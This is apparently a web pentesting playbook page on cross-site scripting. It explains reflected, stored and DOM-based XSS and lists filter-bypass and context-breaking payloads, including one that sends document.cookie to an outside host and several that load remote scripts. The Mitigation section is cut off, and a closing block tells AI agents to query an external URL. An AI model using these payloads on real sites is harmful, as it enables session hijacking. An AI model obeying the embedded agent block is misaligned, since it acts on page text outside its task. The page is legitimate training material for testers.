# XSS

XSS (Cross Site Scripting) is a client-side code injection attack where an attacker can execute malicious scripts in the web browser.

### Impact

* **Account Hijacking**: Attackers could steal session cookies and take over victim's session. It could lead to administrative access in case of an administrator account hijack.
* **Credential Theft**: Theft of credentials such as passwords from a login page clone.
* **Data Leakage**: Personally identifiable information (PII) such as credit card number, SSN, or any data stored in the browser could be accessed.
* Redirect to malicious webpages, keylogging, downloading malware.
* Access geolocation, webcam, miccrophone, and files on system.

There are 3 types of XSS:

* Reflected (Non-persistent)
* Stored (Persistent)
* DOM-based

## Reflected (Non-Persistent)

When the payload is part of the request that is sent to the server and is reflected back in the response.

For example, a website's dashboard greets the user by their username. If the username is not sanitized properly, it could execute JS code.

## Stored (Persistent)

When the payload passed to the web application is stored on the server and executes when rendered elsewhere. 

For example, payloads could be saved as comments on a page and then when the comments are loaded, it could execute JS code.

## DOM-based

DOM objects are manipulated to execute malicious code. This is an advanced attack as the payload never reaches the WAFs and executes on the client-side.

For example, the "document.write(document.URL)"  could be used to retrieve malicious contents of some malicious site and execute it.

## Entry Points

Any user-controlled parameter such as:

* Input fields
* Host Headers, Referer
* URL redirection
* URI parameters
* File Upload (File name)

## # Payloads

### Popular

```
<script>alert(1)</script>
<!--><script src=//14.rs>
url=%26%2302java%26%23115cript:alert(document.domain)
<video><source onerror=location=/\02.rs/+document.cookie>
<script>alert(document.domain)</script>
<iframe src="javascript:alert(1)">
<embed src=//14.rs>
<details ontoggle=alert(1) open>test</details>
<xss onclick="alert(1)" style=display:block>test</xss>
<xss draggable="true" ondragstart="alert(1)" style=display:block>test</xss>
<script>onerror=alert;throw 1</script>

Polyglots:
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`


```

### Context Breaking

#### HTML Context

Case:  \<tag> Searched for $input \</tag>

```
<svg onload=alert()>
</tag><svg onload=alert()>
```

#### Attribute Context

Case: \<tag attribute="$input">

```
"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()
```

#### JavaScript Context

Case: \<script> var new something = '$input'; \<script>

```
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>
```

### Bypassing

#### Without Event Handlers

```
<object data=javascript:confirm()>
<a href=javascript:confirm()>click here
<script src=//14.rs></script>
<script>confirm()</script>
```

#### Without Space

```
<svg/onload=confirm()>
<iframe/src=javascript:alert(1)>
```

#### Without Slash (/)

```
<svg onload=confirm()>
<img src=x onerror=confirm()>
```

#### Without closing angular bracket (>)

```
<svg onload=confirm()//
<svg onload=alert(1)<!--
```

#### Without alert, confirm, prompt

```
<script src=//14.rs></script>
<svg onload=co\u006efirm()>
<svg onload=z=co\u006efir\u006d,z()>
```

#### Without a Valid HTML tag

```
<x onclick=confirm()>click here
<x ondrag=aconfirm()>drag it
```

## Mitigation

* L


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://playbook.sidthoviti.com/web-app-pentesting/xss.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.